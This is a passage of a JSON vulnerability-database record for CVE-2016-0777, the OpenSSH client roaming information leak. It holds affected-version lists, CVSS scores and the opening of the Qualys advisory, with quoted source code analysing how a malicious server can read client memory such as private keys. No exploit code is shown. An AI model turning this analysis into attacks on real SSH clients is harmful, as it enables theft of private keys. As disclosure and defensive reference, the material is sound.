15.1f5", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 14.2r1", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "junos 12.1x46-d15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.1" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "5.6" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.1" }, { "model": "junos 12.1x47-d15", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "7" }, { "model": "junos 14.1r2", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "6.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.6, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.20" }, { "model": "junos 12.1x47-d35", "scope": "ne", "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.1.4" }, { "model": "junos 12.3x48-d10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d26", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "p2", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "5.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.6, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "purepower integrated manager power vc appliance", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.6, "vendor": "s u s e", "version": "13.2" }, { "model": "junos 12.3r10", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.0.5" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openssh", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 0.6, "vendor": "ubuntu", "version": "15.04" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "5.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.3.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.6, "vendor": "paloaltonetworks", "version": "6.1.10" }, { "model": "junos 14.1r6", "scope": null, "trust": 0.6, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "x10.10.5" }, { "model": "6.9p1", "scope": null, "trust": 0.6, "vendor": "openssh", "version": null }, { "model": "junos 12.3r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.70" }, { "model": "junos 13.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.00" }, { "model": "junos 13.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "10.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 12.1x47-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "10.0-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p34", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1.1" }, { "model": "10.2-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 13.3r1.7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "10.1-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p27", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-beta2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "10.1-beta3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "10.1-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p21", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "10.1-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc4-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-beta2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mq appliance m2000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 13.3r1.8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "10.0-release-p18", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1" }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 12.3r1.8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "10.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-release-p10", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.318:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:220:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:320:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:625:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:425:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:525:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:120:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false }, { "cpe23Uri": "cpe:2.3:h:sophos:unified_threat_management:110:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.3:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.2:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hp:remote_device_access_virtual_customer_access_system:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "15.07", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.3", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-0777" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Qualys Security Advisory team", "sources": [ { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" } ], "trust": 0.6 }, "cve": "CVE-2016-0777", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-88287", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2016-0777", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-0777", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-249", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-88287", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-0777", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. \nSuccessfully exploiting this issue allows attackers to obtain sensitive information that may aid in further attacks. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed 